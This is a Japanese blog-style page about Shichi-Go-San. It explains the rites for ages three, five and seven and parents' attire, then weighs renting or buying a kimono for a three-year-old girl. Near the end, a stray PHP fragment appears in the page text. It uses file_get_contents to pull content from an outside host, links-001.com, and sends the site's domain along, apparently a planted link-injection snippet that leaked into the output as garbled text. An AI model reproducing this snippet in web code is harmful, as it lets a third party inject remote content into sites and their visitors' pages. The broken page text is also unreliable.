前へ
次へ

子の健やかな成長を祝う七五三という儀式

七五三とは三歳、五歳、七歳に成長した子どもを祝う行事です。昔は貧困で食べる事もままならず栄養不足だったり医療も発展していなかった為、今よりもずっと子どもの生存率が低くありました。そのためこの歳まで成長できた事が喜ばしい事としてお祝いした事が現在も風習として残っているのです。七歳、五歳、三歳という時期にはそれぞれ意味があります。三歳は「髪置きの儀」と言い、その歳まで行っていた剃髪を終了する為のけじめの儀式です。男女ともに祝います。五歳は「袴儀」と言い、男の子がこれからは袴を着用していくという成長を喜ぶ祝いです。七歳は「帯解きの儀」と言い、女の子が大人と同じ帯を結んでいくという成長を喜ぶ祝いです。どれも子どもが大人になっていく第一歩として祝う儀式です。七五三で意外に悩むのが親の服装です。基本的には子供が主役の行事ですが、だからといって親がどんな格好でもよいというわけではありません。子供の服装に合わせてある程度きちんとした身なりにする必要があります。例えば仕立ての良いスーツやワンピース、子供に合わせて和装を選ぶということも良いでしょう。しかし主役はあくまでも子どもです。華美な装飾や派手な色遣いは避けるようにするべきです。派手すぎず、けれど地味な印象でもいけません。また自分達の着替えに時間がかかって子供の身支度が疎かになってもいけません。スーツやワンピースなどの方が着替えに時間もかかりませんし、動きやすいというメリットもあります。無理をせずに実用性で選ぶことも大切です。七五三のお祝いをする時期に近付いてきました。今回、お祝いをするのは三歳の女の子になります。三歳の女の子で、お祝いならば帯をつけての着物か帯をしないで被布を被せる形の着物か無難に洋服にするかだと思います。洋服ならば、購入して着るところですが着物だとレンタルしたものを着るのか購入したものを着せるのかで悩んでいます。洋服に比べると、高いイメージの着物ですし子供物だと一度着て兄弟がいない限りは二度着る事がないのでもったいない気がしますし買ったものの着てくれなかったらもったいないので悩んでいます。いろいろと調べてみると、写真館でちゃんと着物を着る事が出来たら購入するという方もいるようなので私も七五三の服装はそうしようかなと思っています。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top